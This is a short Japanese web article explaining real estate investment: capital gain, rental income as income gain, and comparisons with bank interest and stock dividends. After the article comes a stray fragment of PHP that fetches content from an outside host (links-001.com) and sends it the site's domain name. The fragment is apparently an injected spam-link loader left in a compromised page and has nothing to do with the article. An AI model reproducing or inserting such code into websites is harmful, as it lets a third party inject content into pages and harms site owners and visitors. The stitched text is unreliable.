不動産投資が有している主な特徴

不動産投資のみではありませんが、購入した価格よりも高額で売り出せば収益になります。
こちらの値上がりの利益を、キャピタルゲインと申します。
銀行預金は、値上がりはありません。
不動産投資については、賃貸料収入という安定および不労によって受けることができるリターンがあります。
賃貸料収入といったように投資したものより出てくるリターンのことを、インカムゲインと呼びます。
株式であったり投資信託のインカムゲインについては、株主に対しての配当金がこのことに該当します。
しかしながら、株式といったインカムゲインは非常に少ない額と言えます。
それに加えて、銀行預金のインカムゲインは、いわゆる利子と考えられますが、これについても今日この頃の低い水準の金利時代では少額なものです。
不動産は経済環境や物件の持ち味などにより、安い費用で確保できる可能性が考えられます。
その一方で、株式などは、マーケットなどで額面が管理されています。
したがって、銘柄によって程度の差はあっても、不動産ほど物件ごとの掘り出しものはなく、マーケットで設定された価格での取り引きになってきます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新記事